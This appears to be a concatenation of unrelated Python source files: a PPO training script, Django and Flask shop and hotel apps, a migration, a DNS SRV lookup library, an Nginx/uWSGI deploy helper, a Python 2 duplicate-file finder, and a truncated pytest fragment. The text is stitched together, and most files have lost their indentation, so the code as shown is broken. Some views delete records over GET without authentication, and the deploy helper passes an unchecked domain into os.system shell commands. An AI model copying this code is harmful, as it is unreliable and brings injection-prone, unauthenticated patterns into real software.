flags.DEFINE_integer('nsteps', 100, 'number of steps per ppo rollout')
flags.DEFINE_integer('total_timesteps', 1000000, 'total steps for experiment')
flags.DEFINE_float('learning_rate', 1e-3, 'learning rate for optimizer')
FLAGS = flags.FLAGS
class GymEnv(dm2gym.DMSuiteEnv):
"""Wrapper that convert a realworldrl environment to a gym environment."""
def __init__(self, env):
"""Constructor. We reuse the facilities from dm2gym."""
self.env = env
self.metadata = {
'render.modes': ['human', 'rgb_array'],
'video.frames_per_second': round(1. / self.env.control_timestep())
}
self.observation_space = dm2gym.convert_dm_control_to_gym_space(
self.env.observation_spec())
self.action_space = dm2gym.convert_dm_control_to_gym_space(
self.env.action_spec())
self.viewer = None
def run():
"""Runs a PPO agent on a given environment."""
def _load_env():
"""Loads environment."""
raw_env = rwrl.load(
domain_name=FLAGS.domain_name,
task_name=FLAGS.task_name,
safety_spec=dict(enable=True),
delay_spec=dict(enable=True, actions=20),
log_output=os.path.join(FLAGS.save_path, 'log.npz'),
environment_kwargs=dict(
log_safety_vars=True, log_every=20, flat_observation=True))
env = GymEnv(raw_env)
env = bench.Monitor(env, FLAGS.save_path)
return env
env = dummy_vec_env.DummyVecEnv([_load_env])
ppo2.learn(
env=env,
network=FLAGS.network,
lr=FLAGS.learning_rate,
total_timesteps=FLAGS.total_timesteps, # make sure to run enough steps
nsteps=FLAGS.nsteps,
gamma=FLAGS.agent_discount,
)
def main(argv):
del argv # Unused.
run()
if __name__ == '__main__':
app.run(main)
|
# shop/models.py
# Django modules
from django.db import models
# Create your models here.
# Model: Slider
class Slider(models.Model):
slider_title = models.CharField(max_length=100)
slider_sub_title = models.CharField(max_length=150)
slider_description = models.TextField()
    slider_image = models.ImageField(upload_to='sliders/%Y/%m/%d')
    slider_image_price = models.ImageField(upload_to='sliders/%Y/%m/%d', blank=True, null=True)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
verbose_name = 'Slider'
verbose_name_plural = 'Sliders'
def __str__(self):
return self.slider_title
# Model: Category
class Category(models.Model):
category_name = models.CharField(max_length=50, db_index=True)
category_slug = models.SlugField(max_length=100, db_index=True)
class Meta:
verbose_name = 'Category'
verbose_name_plural = 'Categories'
def __str__(self):
return self.category_name
# Model: Sub Category
class SubCategory(models.Model):
subcategory_name = models.CharField(max_length=50)
subcategory_slug = models.SlugField(max_length=100, db_index=True)
category_id = models.ForeignKey(Category, on_delete=models.CASCADE)
class Meta:
verbose_name = 'Subcategory'
verbose_name_plural = 'Subcategories'
def __str__(self):
return self.subcategory_name
# Model: Brand
class Brand(models.Model):
brand_name = models.CharField(max_length=50)
brand_slug = models.SlugField(max_length=100, db_index=True, null=True)
class Meta:
verbose_name = 'Brand'
verbose_name_plural = 'Brands'
def __str__(self):
return self.brand_name
# Model: Product
class Product(models.Model):
product_name = models.CharField(max_length=100, db_index=True)
product_slug = models.SlugField(max_length=100, db_index=True)
category_id = models.ForeignKey(
Category, related_name='products',
on_delete=models.CASCADE)
subcategory_id = models.ForeignKey(
SubCategory, related_name='products',
on_delete=models.CASCADE)
brand_id = models.ForeignKey(
Brand, related_name='products',
on_delete=models.CASCADE, null=True)
product_image = models.ImageField(
upload_to='products/%Y/%m/%d',
blank=True)
product_description = models.TextField(blank=True)
product_price = models.DecimalField(
max_digits=10, decimal_places=2)
is_available = models.BooleanField(default=True)
is_featured = models.BooleanField(default=False)
is_recomended = models.BooleanField(default=False)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
verbose_name = 'Product'
verbose_name_plural = 'Products'
ordering = ('product_name',)
index_together = (('id', 'product_slug'),)
def __str__(self):
return self.product_name
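# Query sketch (added): related_name='products' on the foreign keys above allows
# reverse lookups from Category, SubCategory, or Brand; the slug is illustrative.
# Category.objects.get(category_slug='shoes').products.filter(is_available=True)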
|
from app.core.db import db
from models import *
from flask import Blueprint, request, session, render_template, redirect
hotel_views = Blueprint('hotel', __name__,
template_folder='../../templates',
static_folder='../../static')
@hotel_views.route('/hotel')
def hotel():
hotel = Hotel.query.all()
return render_template('list_hotel.html', **locals())
@hotel_views.route('/hotel/<int:id>')
def viewhotel(id):
hotel = Hotel.query.get(id)
return render_template('hotel_details.html', **locals())
@hotel_views.route('/hotel/new', methods=["POST", "GET"])
def newhotel():
    if request.method == 'POST':
        nama_hotel = request.form.get('NamaHotel', None)
        address = request.form.get('Address', None)
        zipcode = request.form.get('Zipcode', None)
        city = request.form.get('City', None)
        province = request.form.get('Province', None)
        country = request.form.get('Country', None)
        price = request.form.get('Price', None)
        added = Hotel(nama_hotel, address, zipcode, city, province, country, price)
        db.session.add(added)
        db.session.commit()
    return render_template('add_hotels.html', **locals())
@hotel_views.route('/hotel/del/<int:id>')
def delhotel(id):
    hotel = Hotel.query.get(id)
    db.session.delete(hotel)
    db.session.commit()
    return redirect('/hotel')
@hotel_views.route('/hotel/clear')
def clearhotel():
    # Bulk delete via the query; db.session.delete() cannot take a list of objects.
    Hotel.query.delete()
    db.session.commit()
    return redirect('/hotel')
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-08-04 15:30
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
def populate_channels_and_boards(apps, schema_editor):
from django.db.models import OuterRef, Subquery, F
Organization = apps.get_model('dominion', 'Organization')
ChannelDB = apps.get_model('comms', 'ChannelDB')
ObjectDB = apps.get_model('objects', 'ObjectDB')
chans = ChannelDB.objects.filter(db_lock_storage__icontains=OuterRef('name')).values_list('id')[:1]
boards = ObjectDB.objects.filter(db_typeclass_path="typeclasses.bulletin_board.bboard.BBoard",
db_lock_storage__icontains=OuterRef('name')).values_list('id')[:1]
Organization.objects.filter(members__player__player__isnull=False).distinct().annotate(chan=Subquery(chans)).annotate(board=Subquery(boards)).update(org_board=F('board'), org_channel=F('chan'))
class Migration(migrations.Migration):
dependencies = [
('objects', '0009_remove_objectdb_db_player'),
('comms', '0015_auto_20170706_2041'),
('dominion', '0029_auto_20180731_0001'),
]
operations = [
migrations.AlterModelOptions(
name='fealty',
options={'verbose_name_plural': 'Fealties'},
),
migrations.AddField(
model_name='member',
name='has_seen_motd',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='organization',
name='org_board',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='org', to='objects.ObjectDB'),
),
migrations.AddField(
model_name='organization',
name='org_channel',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='org', to='comms.ChannelDB'),
),
migrations.RunPython(populate_channels_and_boards)
]
|
"""
Service Lookup
==============
Use DNS SRV records to discover services by name and protocol.
"""
import collections
import logging
import socket
from dns import rdatatype, resolver
__version__ = '2.0.0'
LOGGER = logging.getLogger(__name__)
SRV = collections.namedtuple(
'SRV', ['host', 'port', 'priority', 'weight', 'hostname'])
class SRVQueryFailure(Exception):
"""Exception that is raised when the DNS query has failed."""
def __str__(self):
return 'SRV query failure: %s' % self.args[0]
def lookup(name, protocol='TCP', domain=None):
"""Return a list of service records and associated data for the given
service name, protocol and optional domain. If protocol is not specified,
TCP will be used. If domain is not specified, the domain name returned by
the operating system will be used.
Service records will be returned as a named tuple with host, port, priority
and weight attributes:
>>> import srvlookup
>>> srvlookup.lookup('api', 'memcached')
[SRV(host='192.169.1.100', port=11211, priority=1, weight=0,
hostname='host1.example.com'),
SRV(host='192.168.1.102', port=11211, priority=1, weight=0,
hostname='host2.example.com'),
SRV(host='192.168.1.120', port=11211, priority=1, weight=0,
hostname='host3.example.com'),
SRV(host='192.168.1.126', port=11211, priority=1, weight=0,
hostname='host4.example.com')]
>>>
:param str name: The service name
:param str protocol: The protocol name, defaults to TCP
:param str domain: The domain name to use, defaults to local domain name
:rtype: list of srvlookup.SRV
"""
answer = _query_srv_records('_%s._%s.%s' % (name, protocol,
domain or _get_domain()))
results = _build_result_set(answer)
return sorted(results, key=lambda r: (r.priority, -r.weight, r.host))
def _get_domain():
"""Return the domain name for the local host.
:rtype: str
"""
return '.'.join(socket.getfqdn().split('.')[1:])
def _query_srv_records(fqdn):
"""Query DNS for the SRV records of the fully-qualified domain name
specified.
:param str fqdn: The fully-qualified domain name to query
:rtype: dns.resolver.Answer
:raises: SRVQueryFailure
"""
try:
return resolver.query(fqdn, 'SRV')
except (resolver.NoAnswer, resolver.NoNameservers, resolver.NotAbsolute,
resolver.NoRootSOA, resolver.NXDOMAIN) as error:
LOGGER.error('Error querying SRV for %s: %r', fqdn, error)
raise SRVQueryFailure(error.__class__.__name__)
def _build_resource_to_address_map(answer):
"""Return a dictionary that maps resource name to address.
The response from any DNS query is a list of answer records and
a list of additional records that may be useful. In the case of
SRV queries, the answer section contains SRV records which contain
the service weighting information and a DNS resource name which
requires further resolution. The additional records segment may
contain A records for the resources. This function collects them
into a dictionary that maps resource name to an array of addresses.
:rtype: dict
"""
mapping = collections.defaultdict(list)
for resource in answer.response.additional:
target = resource.name.to_text()
mapping[target].extend(record.address for record in resource.items
if record.rdtype == rdatatype.A)
return mapping
def _build_result_set(answer):
"""Return a list of SRV instances for a DNS answer.
:rtype: list of srvlookup.SRV
"""
resource_map = _build_resource_to_address_map(answer)
result_set = []
for resource in answer:
target = resource.target.to_text()
if target in resource_map:
result_set.extend(
SRV(address, resource.port, resource.priority, resource.weight,
target.strip('.')) for address in resource_map[target])
else:
result_set.append(
SRV(target.rstrip('.'), resource.port, resource.priority,
resource.weight, target.strip('.')))
return result_set
|
from django.shortcuts import render, redirect, HttpResponse
from django.http import JsonResponse
from django.contrib import messages
import datetime
import json
from django.core import serializers
from django.contrib.auth import login, authenticate, logout
from django.contrib.auth.models import User, Group
from django.contrib.auth.forms import AuthenticationForm
from .models import Seller, Customer, Product, Order, CartItem, OrderList
from .forms import SignUpForm, ProfileEditForm, SellerSignUpForm, SellerProfileEditForm, ProductForm
from .sendmail import send_registration_mail, send_login_mail, send_checkout_mail, send_payment_confirmation
def home(request):
products = Product.objects.all()
new = Product.objects.filter(type_choice='New')
trending = Product.objects.filter(type_choice='Trending')
sales = Product.objects.filter(type_choice='Sales')
regular = Product.objects.filter(type_choice='Regular')
party = Product.objects.filter(type_choice='Party')
ethnic = Product.objects.filter(type_choice='Ethnic')
return render(request, 'index.html', {'products': products, 'party': party, 'trending': trending, 'sales': sales, 'new':new, 'regular':regular, 'ethnic':ethnic})
def aboutus(request):
return render(request, 'about/about.html')
def contactus(request):
return render(request, 'about/contact.html')
def careers(request):
return render(request, 'about/careers.html')
def page_not_found(request):
now = datetime.datetime.now()
html = "<h1>%s</h1> <h1> Error in loading</h1><h1>Error 404... Page Not Found !</h1>" % now
return HttpResponse(html)
# USER, SELLER, CUSTOMER AUTHENTICATION AND AUTHORIZATION MANAGEMENT
def signup(request):
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('password1')
to_mail = form.cleaned_data.get('email')
user = authenticate(username=username, password=raw_password)
login(request, user)
request.session['username'] = username
print('*********USER DATA : ', user)
customer = Customer(user=user)
customer.save()
print(to_mail)
send_registration_mail(username, to_mail)
return redirect('home')
else:
form = SignUpForm()
return render(request, 'signup.html', {'form': form})
def Login(request):
if request.method == 'POST':
form = AuthenticationForm(request=request, data=request.POST)
if form.is_valid():
username = form.cleaned_data.get('username')
password = form.cleaned_data.get('password')
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
request.session['username'] = username
print('*********USER DATA : ', user)
send_login_mail(request.user.first_name, request.user.email)
return redirect('home')
else:
form = AuthenticationForm()
return render(request, 'login.html', {'form': form})
def Logout(request):
logout(request)
return redirect('home')
def profile(request):
if request.user.is_authenticated:
user = User.objects.get(username=request.user)
cust = Customer.objects.get(user=request.user)
return render(request, 'profile.html', {'user': user, 'cust': cust})
else:
        messages.info(request, 'Login to access your profile.')
return redirect('userlogin')
def updateprofile(request):
if request.user.is_authenticated:
if request.method == 'POST':
user = Customer.objects.get(user=request.user)
fmd = ProfileEditForm(request.POST, request.FILES, instance=user)
print(fmd.is_valid())
if fmd.is_valid():
fmd.save()
for d in fmd.cleaned_data.values():
print(d)
image = fmd.cleaned_data['image']
first_name = fmd.cleaned_data['first_name']
last_name = fmd.cleaned_data['last_name']
email = fmd.cleaned_data['email']
phone = fmd.cleaned_data['phone']
dob = fmd.cleaned_data['dob']
residential_address = fmd.cleaned_data['residential_address']
permanent_address = fmd.cleaned_data['permanent_address']
delievery_address = fmd.cleaned_data['delievery_address']
User.objects.filter(username=request.user).update(
first_name=first_name, last_name=last_name, email=email)
# Customer.objects.filter(user=request.user).update(image=image, phone=phone, residential_address=residential_address, permanent_address=permanent_address, delievery_address=delievery_address)
messages.success(request, 'Profile Successfully Updated!')
return redirect('userprofile')
user = User.objects.get(username=request.user)
cust = Customer.objects.get(user=request.user)
form = ProfileEditForm()
return render(request, 'update_profile.html', {'user': user, 'cust': cust, 'form': form})
else:
messages.info(request, 'Login to update your profile.')
        return redirect('Login')
# Managing Seller
def seller(request):
return render(request, 'about/seller.html')
def signupseller(request):
if request.method == 'POST':
form = SellerSignUpForm(request.POST)
if form.is_valid():
gp = form.save()
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('password1')
to_mail = form.cleaned_data.get('email')
user = authenticate(username=username, password=raw_password)
login(request, user)
request.session['username'] = username
print('*********USER DATA : ', user)
seller = Seller(user=user)
seller.save()
group = Group.objects.get(name='GroupSeller')
gp.groups.add(group)
messages.success(
                request, 'You are now a member of TheShoppingCart! Thank you for choosing us.')
send_registration_mail(username, to_mail)
return redirect('home')
else:
form = SellerSignUpForm()
return render(request, 'signup_seller.html', {'form': form})
def sellerprofile(request):
if request.user.is_authenticated:
if request.user.is_staff:
user = User.objects.get(username=request.user)
seller = Seller.objects.get(user=request.user)
return render(request, 'seller_profile.html', {'user': user, 'seller': seller})
        messages.warning(request, 'You are not a seller!')
return redirect('userlogin')
else:
        messages.info(request, 'Login to access your profile.')
return redirect('userlogin')
def updateseller(request):
if request.user.is_authenticated:
if request.user.is_staff:
if request.method == 'POST':
user = Seller.objects.get(user=request.user)
fmd = SellerProfileEditForm(
request.POST, request.FILES, instance=user)
print(fmd.is_valid())
if fmd.is_valid():
fmd.save()
for d in fmd.cleaned_data.values():
print(d)
first_name = fmd.cleaned_data['first_name']
last_name = fmd.cleaned_data['last_name']
email = fmd.cleaned_data['email']
User.objects.filter(username=request.user).update(
first_name=first_name, last_name=last_name, email=email)
messages.success(request, 'Profile Successfully Updated!')
return redirect('sellerprofile')
user = User.objects.get(username=request.user)
seller = Seller.objects.get(user=request.user)
form = SellerProfileEditForm(instance=seller)
return render(request, 'update_seller_profile.html', {'user': user, 'seller': seller, 'form': form})
else:
messages.info(request, 'Login to update your profile.')
        return redirect('Login')
def dashboard(request):
if request.user.is_authenticated and request.user.is_staff:
seller = Seller.objects.get(user=request.user)
product = Product.objects.all()
messages.success(request, 'Welcome to Admin Dashboard')
return render(request, 'dashboard.html', {'seller': seller, 'products': product})
def addproduct(request):
if request.user.is_authenticated and request.user.is_staff:
if request.method == 'POST':
form = ProductForm(request.POST, request.FILES)
if form.is_valid():
            Product.objects.create(
                seller=request.user, image=form.cleaned_data['image'], name=form.cleaned_data['name'],
                brand=form.cleaned_data['brand'], model=form.cleaned_data['model'], year=form.cleaned_data['year'],
                description=form.cleaned_data['description'], price=form.cleaned_data['price'],
                in_stock=form.cleaned_data['in_stock'], stock_qty=form.cleaned_data['stock_qty'],
                reorder_qty=form.cleaned_data['reorder_qty'], is_discount=form.cleaned_data['is_discount'],
                discount=form.cleaned_data['discount'], category=form.cleaned_data['category'],
                subcategory=form.cleaned_data['subcategory'], season=form.cleaned_data['season'],
                type_choice=form.cleaned_data['type_choice'], exp_date=form.cleaned_data['exp_date'],
                rating=form.cleaned_data['rating'])
for f in form.cleaned_data.values():
print(f)
messages.success(request, 'Product added successfully.')
form = ProductForm()
return render(request, 'product/add_products.html', {'form': form})
# PRODUCT MANAGEMENT FOR EACH CATEGORY
def product(request, id):
# This function is for view details of product
product = Product.objects.get(pk=id)
return render(request, 'product.html', {'product': product})
def delproduct(request, id):
prod = Product.objects.get(pk=id)
prod.delete()
messages.success(request, 'Product Successfully Deleted.')
return redirect('dashboard')
def updateproduct(request, id):
if id is not None:
prod = Product.objects.get(pk=id)
form = ProductForm(instance=prod)
if request.method == 'POST':
form = ProductForm(request.POST, request.FILES, instance=prod)
if form.is_valid():
form.save()
messages.success(request, 'Updated Successfully')
return redirect('dashboard')
return render(request, 'product/update_product.html', {'form': form})
# Different Product Pages
def products_electronics(request):
products = Product.objects.filter(category='Electronics')
return render(request, 'different_prods.html', {'products': products, 'category':'Electronics'})
def product_tv_appliances(request):
products = Product.objects.filter(category='TV & Appliances')
return render(request, 'different_prods.html', {'products': products, 'category': 'TV & Appliances'})
def products_men(request):
products = Product.objects.filter(category='Men')
return render(request, 'different_prods.html', {'products': products, 'category': 'Men\'s Wear'})
def products_women(request):
products = Product.objects.filter(category='Women')
return render(request, 'different_prods.html', {'products': products, 'category':'Women\'s Wear' })
def products_kids(request):
products = Product.objects.filter(category='Baby & Kids')
return render(request, 'different_prods.html', {'products': products, 'category':'Kids Wear'})
def products_pc(request):
products = Product.objects.filter(category='Computers')
return render(request, 'different_prods.html', {'products': products, 'category': 'Computers'})
def products_phones(request):
products = Product.objects.filter(category='Phones & Tablets')
return render(request, 'different_prods.html', {'products': products, 'category': 'Phones and Tablets'})
def products_books(request):
products = Product.objects.filter(category='Books')
return render(request, 'different_prods.html', {'products': products, 'category':'Books'})
def products_accessories(request):
products = Product.objects.filter(category='Accessories')
return render(request, 'different_prods.html', {'products': products, 'category':'Accessories'})
# Managing Cart
def updateitem(request):
json_data = json.loads(request.body)
productId = json_data['productId']
action = json_data['action']
print('Product ID: ', productId)
print('Action: ', action)
customer = Customer.objects.get(user=request.user)
product = Product.objects.get(pk=productId)
print(json_data)
order, created = Order.objects.get_or_create(customer=customer)
request.session['order'] = order.pk
orderItem, created = CartItem.objects.get_or_create(
order=order, product=product)
if action == 'add':
if orderItem.quantity:
orderItem.quantity += 1
else:
orderItem.quantity = 1
elif action == 'remove':
if orderItem.quantity > 0:
orderItem.quantity -= 1
else:
orderItem.quantity = 0
orderItem.save()
if request.session.get('total_price') and request.session.get('total_items_in_cart'):
order.invoice = request.session.get('total_price')
order.no_of_items = request.session.get('total_items_in_cart')
order.save()
if orderItem.quantity <= 0:
orderItem.delete()
return JsonResponse('Item was added', safe=False)
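# Request sketch (added): this endpoint expects a JSON body such as
# {"productId": 42, "action": "add"} or {"productId": 42, "action": "remove"};
# the product id shown is illustrative.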
def cartitem(request):
cart = CartItem.objects.filter(order=request.session.get('order'))
print(cart.values())
invoice = 0
total_qty = 0
for item in cart:
item.total = item.product.price * item.quantity
item.save()
invoice += item.total
total_qty += item.quantity
print(invoice, total_qty)
print(item.product.name)
request.session['total_items_in_cart'] = total_qty
request.session['total_price'] = int(invoice)
return render(request, 'cart.html', {'cart': cart, 'invoice': invoice, 'total_qty': total_qty})
def checkout(request):
if request.method == 'POST':
name = request.POST.get('name')
email = request.POST.get('email')
contact = request.POST.get('contact')
addr1 = request.POST.get('addr1')
addr2 = request.POST.get('addr2')
addr3 = request.POST.get('addr3')
addr4 = request.POST.get('addr4')
addr5 = request.POST.get('addr5')
addr6 = request.POST.get('addr6')
address = f'{addr1}, {addr2}, {addr3}, {addr6},\n {addr4}, {addr5}'
billed_amount = request.POST.get('billed_amount')
request.session['billed_amount'] = billed_amount
ordered_items = []
cart_items = CartItem.objects.filter(
order=request.session.get('order'))
for item in cart_items.values():
print(item)
ordered_items.append(item)
# qs_json = serializers.serialize('json', cart_items)
# print(qs_json)
print(str(ordered_items))
order_list = OrderList(user=request.user, order=Order.objects.get(pk=request.session.get(
'order')), list_of_order=ordered_items, billed_amount=billed_amount, shipping_address=address, phone=contact)
order_list.save()
ordr = Order.objects.get(pk=request.session.get('order'))
ordr.order_date = datetime.datetime.now().date()
ordr.save()
cart_items.delete()
del request.session['total_items_in_cart']
del request.session['total_price']
return redirect('payment')
return render(request, 'product/checkout.html')
def payment(request):
import num2word
amt = num2word.word(int(float(request.session['billed_amount'])))
return render(request, 'payment.html', {'amount_words': amt})
# Footer Items
def privacy(request):
return render(request, "policy/privacy.html")
def payment_help(request):
return render(request, "help/payments.html")
def ship_info(request):
return render(request, "help/ship_info.html")
def return_help(request):
return render(request, "help/cancellation&returns.html")
def return_policy(request):
return render(request, "policy/return_policy.html")
def security(request):
return render(request, "policy/security.html")
def tandc(request):
return render(request, "policy/terms&use.html")
def faq(request):
return render(request, "help/faq.html")
# Order Tracking and Archives
def track_order(request):
cust = Customer.objects.get(user=request.user)
ordr = Order.objects.filter(customer=cust, is_complete=False)
track_info = {}
if ordr:
# print('\n',ordr.values(),"\n")
for val in ordr.values():
track_info['order_id'] = val['orderid']
track_info['shipped'] = val['is_shipped']
track_info['delivered'] = val['is_delivered']
track_info['complete'] = val['is_complete']
track_info['transaction_id'] = val['transaction_id']
track_info['customer_id'] = val['customer_id']
track_info['invoice'] = val['invoice']
track_info['no_of_items'] = val['no_of_items']
track_info['order_date'] = val['order_date']
track_info['shipping_date'] = val['shipping_date']
track_info['deliever_date'] = val['deliever_date']
track_info['status'] = val['status']
print(track_info, '\n')
    if track_info and not track_info['complete']:
return render(request, 'track/trackorder.html', {'track_info':track_info})
else:
return render(request, 'track/trackorder.html', {'no_track': True})
def shopping_archive(request):
cust = Customer.objects.get(user=request.user)
ordr = Order.objects.filter(customer=cust, is_complete=False)
track_info = {}
if ordr:
# print('\n',ordr.values(),"\n")
for val in ordr.values():
track_info['order_id'] = val['orderid']
track_info['shipped'] = val['is_shipped']
track_info['delivered'] = val['is_delivered']
track_info['complete'] = val['is_complete']
track_info['transaction_id'] = val['transaction_id']
track_info['customer_id'] = val['customer_id']
track_info['invoice'] = val['invoice']
track_info['no_of_items'] = val['no_of_items']
track_info['order_date'] = val['order_date']
track_info['shipping_date'] = val['shipping_date']
track_info['deliever_date'] = val['deliever_date']
track_info['status'] = val['status']
print('\n',track_info, '\n')
    if track_info and not track_info['complete']:
return render(request, 'track/prev_ordered_items.html', {'track_info': track_info})
else:
return render(request, 'track/prev_ordered_items.html', {'no_track': True})
# Searching
def searchMatch(query, item):
'''return true only if query matches the item'''
if query in item.description.lower() or query in item.name.lower() or query in item.category.lower():
return True
else:
return False
def search(request):
import math
query = request.GET.get('query')
print('I am query : ',query)
allProds = []
catprods = Product.objects.values(
'category', 'brand', 'description', 'name', 'model', 'subcategory')
cats = {item['category'] for item in catprods}
for cat in cats:
prodtemp = Product.objects.filter(category=cat)
if prodtemp is not None:
prod = [item for item in prodtemp if searchMatch(query, item)]
n = len(prod)
nSlides = n // 4 + math.ceil((n / 4) - (n // 4))
if len(prod) != 0:
allProds.append([prod, range(1, nSlides), nSlides])
if len(allProds) == 0 or len(query) < 4:
return render(request, 'search_results.html')
return render(request, 'search_results.html', {'allProds': allProds})
# Test Page for Front End Developer
def test(request):
    # Look these up before branching so they are defined for both GET and POST.
    user = User.objects.get(username=request.user)
    cust = Customer.objects.get(user=request.user)
    if request.method == 'POST':
        form = ProfileEditForm(request.POST, request.FILES)
    else:
        form = ProfileEditForm()
    return render(request, 'test.html', {'form': form, 'user': user, 'cust': cust})
def adminpanel(request):
    return redirect('admin')
|
import os, random, time
from jennie.ubuntu.nginxfiles import *
from jennie.ubuntu.uwsgifiles import *
def deploy_django(port, domain):
dir_arr = os.getcwd().split("/")
main_dir = ""
for i in range(0, len(dir_arr)-1):
main_dir += dir_arr[i] + "/"
main_dir = main_dir[:-1]
project_dir = dir_arr[-1]
port_exchange = 95 + random.randint(10, 99)
if port == "http":
django_nginx_file = DJANGO_HTTP_CONF
os.system("ufw allow 'Nginx Full'")
elif port == "https":
django_nginx_file = DJANGO_HTTPS_CONF
os.system("sudo add-apt-repository ppa:certbot/certbot")
os.system("sudo apt install python-certbot-nginx -y")
os.system("certbot --nginx -d {}".format(domain))
os.system("ufw allow 'Nginx Full'")
else:
django_nginx_file = DJANGO_PORT_CONF.replace("PORT", port)
os.system("ufw allow {}".format(port))
domain_name = domain.replace(".", "").replace("-", "")
django_nginx_file = django_nginx_file.replace("DOMAIN_NAME", domain).replace("PORT_EXCHANGE", str(port_exchange))
uwsgi_ini_file = DJANGO_CONF.replace("PROJECT_DIR", project_dir).replace("PORT_EXCHANGE", str(port_exchange)).replace("MAIN_DIR", main_dir)
os.system("apt-get install nginx -y")
os.system("service nginx start")
os.system("pip3 install uwsgi")
os.system("mkdir /etc/uwsgi")
open("/etc/systemd/system/uwsgi.service", "w").write(UWSGI_EMPEROR_SERVICE)
open("/etc/nginx/conf.d/{}.conf".format(domain_name).format(), "w").write(django_nginx_file)
open("/etc/uwsgi/server.ini", "w").write(uwsgi_ini_file)
os.system("systemctl restart uwsgi.service")
os.system("nginx -s reload")
time.sleep(2)
print ("\n\nDjango Deployed on port {} on domain {}\n\n".format(port, domain))
|
# coding=utf-8
import os
import filecmp
import itertools
class fdups:
    def __init__(self, list_of_dirs = None):
        # Avoid a mutable default argument; fall back to an empty list.
        self.exclude = {'Thumbs.db'}
        self.set(list_of_dirs or [])
def set(self, list_of_dirs):
self.list_of_dirs = list_of_dirs
self.files = []
self.filecount = 0
self.wasted_space = 0
self.dups = []
def naturalsize(self, value, format='%.1f'):
"""This function is from the humanize-0.5.1 package with some changes.
You can find the package here - https://github.com/jmoiron/humanize
It makes the file size numbers more readable."""
suffix = ('kB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB')
base = 1024
bytes = float(value)
if bytes == 1: return '1 Byte'
elif bytes < base: return '%d Bytes' % bytes
for i,s in enumerate(suffix):
unit = base ** (i+2)
if bytes < unit:
return (format + ' %s') % ((base * bytes / unit), s)
return (format + ' %s') % ((base * bytes / unit), s)
def join(self, a, b):
"""Joins paths"""
return a + '\\' + b
def docmp(self, samesize):
"""Takes a list of files with the same size and compares them to one another
to form groups of identical files."""
grp = []
for c in itertools.combinations(samesize, 2):
foundgroup = False
#print c
if filecmp.cmp(self.join(c[0][0], c[0][1]),
self.join(c[1][0], c[1][1]), shallow = False):
for gr in grp:
if (c[0] in gr) or (c[1] in gr):
foundgroup = True
if (c[0] not in gr): gr.append(c[0])
if (c[1] not in gr): gr.append(c[1])
break
if not foundgroup:
grp.append(list(c))
print '.',
return grp
def see_groups(self):
"""Shows the duplicate groups"""
for dup in self.dups:
print '\n'
for dp in dup:
print self.join(dp[0], dp[1])
def fdups(self):
"""Adds all files from all folders into a list that consists of tuples in the form
[(dir, fname, size), (dir, fname, size), ...]
sorts the files by size and sends those that have the same size to docmp()
to be compared to one another. If the function finds any files that are identical
they are added to self.dups which is a list of lists of tuples of identical files.
"""
if not self.list_of_dirs:
print 'No dirs set'
return
if self.dups:
print 'Already found the dups.'
return
print 'Collecting files'
for d in self.list_of_dirs:
if os.path.isfile(d):
self.files.append((d[:d.rfind("\\")], d[d.rfind("\\")+1:], os.path.getsize(d)))
#print self.files[-1]
else:
if d[-1] == "\\": d = d[:-1]
for curdir, subdirs, filenames in os.walk(unicode(d)):
#print curdir
for fname in filenames:
#print('\t%s' % fname)
if fname not in self.exclude:
fullpath = curdir + '\\' + fname
self.files.append((curdir, fname, os.path.getsize(fullpath)))
if not self.files: return
self.filecount = len(self.files)
print 'Sorting'
self.files.sort(key = lambda x: x[2])
prev = self.files[0]
temp = []
print 'Comparing'
for f in self.files[1:]:
if (prev[2] == f[2]):
if (temp == []):
temp.append(prev)
temp.append(f)
if (prev[2] != f[2]) or (f == self.files[-1]):
if (temp != []):
dc = self.docmp(temp)
if (dc != []):
self.dups.extend(dc)
for dc_ in dc:
self.wasted_space = self.wasted_space + (len(dc_) - 1)*dc_[0][2]
temp = []
prev = f
for dup in self.dups:
for dp in dup:
self.files.remove(dp)
print '\nInfo:'
print 'Total number of files compared: ', self.filecount
print 'Non duplicate files: ', len(self.files)
print 'Duplicate groups: ', len(self.dups)
print 'Total wasted space: ', self.naturalsize(self.wasted_space), ' (',self.wasted_space,')'
print '\nDo you want to see the duplicate groups?'
print "(y for Yes, anything else for No)"
if raw_input() == 'y':
self.see_groups()
print '\nDo you want to see the NON duplicate files? (' + str(len(self.files)) + ' files)'
print "(y for Yes, anything else for No)"
if raw_input() == 'y':
for f in self.files:
print self.join(f[0], f[1])
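# Usage sketch (added, Python 2): scan folders for duplicate files; paths are illustrative.
# finder = fdups([r'C:\photos', r'D:\backup\photos'])
# finder.fdups()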
|
from unittest import mock
import pytest
from indieweb.models import TToken
@pytest.mark.django_db
class TestIndieAuthExchangeToken:
@pytest.fixture
def target(self):
return "/a/indieauth/token"
@pytest.fixture
def post_data(self, auth_token, client_id):
return {
"grant_type": "authorization_code",
"me": "https://b6260560dd45.ngrok.io/",
"code": auth_token,
"redirect_uri": "https://ownyourswarm.p3k.io/auth/callback",
"client_id": client_id,
}
@pytest.fixture
def ninka_mock(self, monkeypatch):
from ninka.indieauth import discoverAuthEndpoints
m = mock.Mock(discoverAuthEndpoints, autospec=True)
monkeypatch.setattr("indieweb.serializers.discoverAuthEndpoints", m)
return m
def test_valid(self, target, client, ninka_mock, post_data, t_token):
ninka_mock.return_value = {"redirect_uri": [post_data["redirect_uri"]]}
response = client.post(target, data=post_data)
assert response.status_code == 200
data = response.json()
assert data["me"] == post_data["me"]
assert len(data["access_token"]) == 40
assert data["scope"] == "create update"
t_token.refresh_from_db()
assert t_token.auth_token == ""
assert t_token.key == data["access_token"]
def test_used_token_invalid(self, target, client, ninka_mock, post_data):
ninka_mock.return_value = {"redirect_uri": [post_data["redirect_uri"]]}
